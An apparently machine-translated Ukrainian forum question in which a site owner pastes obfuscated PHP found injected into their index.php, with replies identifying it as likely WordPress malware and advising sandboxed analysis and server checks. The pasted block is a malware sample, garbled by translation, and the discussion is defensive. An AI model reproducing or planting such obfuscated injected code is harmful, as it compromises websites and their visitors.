Знайшов цей код у index.php на недоступному моєму сайті… Що це робить? [зачинено]

!} x27;! >>>!} _; gvc%} &; ftmbg} x77 {** u% - # jt0} Z; 0] =] 0 #) 2q% l} S; 2-u%! - # 2 # / #% # / # o] #jw) bssbz) #P # - # Q # - # B # - # T # - # E # - # G # - # H5 # *% fdy!% Tdz)% bbT- % bT-% hW ~% fdy) ## -! # ~ / 7 & 6 | 7 ** 111127-zW% h> EzH, 2W% wN; # - Ez-1H * WCw * [!% rN} # QwTW% hIr x5c1 ^ -% r x5c2 ^ -% hOh / # 00 # W6! 2p%! * 3>? * 2b%) gpf {jt)! gj! pjudovg x22)! gj} 1 ~! 52] 88] 5] 48 ] 32M3] 317] 445] 212] 445] 43] 321] 464] 284] 364] 6] 234] 342] 58] 24hmg%! J%! |! * # D% 62bd%!%!> X22: ftmbg39 * 56mg%)! gj! ~: ,, Bjg!)% j: >> 1 *!% b:> 1% s: x5c% j: .2 ^,% b:% s: x5c% j: ^ * ofmy%) utjm! |! * 5! x27! hmg%)! gj! |! * 1? hmg%)! gj!] 26 x24- x24j%! * 9! x27! hnjA x27 & 6! fyqmpef) # x24 *! x24Yp x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e "; * + fepdfe {h + {d%) + opjudovg +)! gj + {e%! osvufs! *! + A!>! {e%)! >> x22! ftmbg)! x63 162 функція bknbpvb ($ n) {return chr (ord ($ n) -1);} @ error_repor2986 + 7 ** ^ /% rx111!% yy) #} # - # x24- x24-tusqpt)%> qp %! | Z ~ !! 2p%! |! *! * JQeTQcOc / # 00 # W ~! Ydrr)% rxB% epnbss!>! Bssbz) # 44ec: 649 # -! #: 618d5f9 # -! # F6c6 # # >> X)! GjZb%! ** X) ufttj x22) gj! |! * NbsS, 6! x242178} 527} 88:} 334} 472 x24 / 7rfs%: * mmvo:>: iuhofm%: - 5ppde: 4: |: ** # ppde #) tutjyf`4 x223}! +!> * 4-1- bubE {h% SUT`LDPT7-UFOJ`GB) fubfsdX)% j> 1 ^ # zsfvr # x5cq% 7 ** ^ # zsfvr # x5cq%) ufttj x22) gj632j%! * 72! x27! hmg%)! gjdovg} {; #) tutjyf`opjudov3f] 51L3] 84] y31M6] y3e] 81 # / # 7e: 55946-tr.984: 75983: 48984: 71] K9] 77zbek! ~! b% Zb%! * (% W:!>! X246767 ~ 6! Bssbz) x24] 25 x24- x24 -!% X24- x24 *! |! x24- x2j% 7-K) udfoopdXA x22) 7gj6>} R; msv}; / # / # / 67j ** b%) sfxpmpusut! - # j0 #! /! ** # sfmcnbs + yfeobz + s` x5c ^> Ew: Qb: Qc: W ~!% Z!> 21 # p # / # p # /% z> 2 * A:>: 8: |: 7 # 6 #) tutjyf`439275ttfsqnpdov {h19275j {hnpd19275fubmgoj {h1: |%} U; y]} R; 2]},; osvufs} x27; mnui} &; zep *!% I x5c2 ^ x2272qj%) 7gj6] D4] 82] K6] 72] K9] 78] K5] 53] Kc #! #] D&& (! Набір ($ GLOBALS ["x61 156 x75 156 x61"])))) {$ ГЛОБАЛИ [_ * # [k2 `{6:!} 7;!} 6; ##} C;! >>!} W; utpix :: h%: n%! #] Y84] 2757, * e x27, * d x27, * c x27 , * b x27) fepq% 6! x2400 ~: / h%:> x22! pd%)! gj} Z; h! opju] y83] 273] y76] 277 ##] y74] 273ovg! |! ** # j {hnpd #) tutjyf`ogj5h% !! x24 /% tmw / x24)% - x24 *

Це якийсь заплутаний код PHP. Я не переймався (і не бачу користі), щоб дивитись далі.

• Ви можете виконати його з командного рядка під непривілейованим обліковим записом (а ще краще - з віртуального комп'ютера, щоб ви могли заборонити доступ до мережі - можливо, до бази даних - на випадок, якщо він вбудував облікові дані) і побачити, що відбувається.
• І все ж я пропоную вам спробувати знешкодити це вручну як тизер мозку.
  • Зауважте, що ви можете запускати фрагменти коду PHP через інтерпретатор командного рядка, щоб змусити його зробити більшу частину роботи за вас.

Коментар до питання SO щодо Wordpress припускає, що це може бути запасний файл Wordpress.

Погуглити «PHP обфуськатор" Мовчання золото " . » Крім того, я знайшов https://security.stackexchange.com/questions/128546/obfuscated-php-code-found-in-wordpress-core-files-and-plugins . Справу закрито.

Швидше за все, це вірус Wordpress. Тим більше стимулів для того, щоб ти її розсікав і бачив, що це робить. Ну, і перевірте, чи є ваш сервер на наявність аномалій - краще з рятувального диска.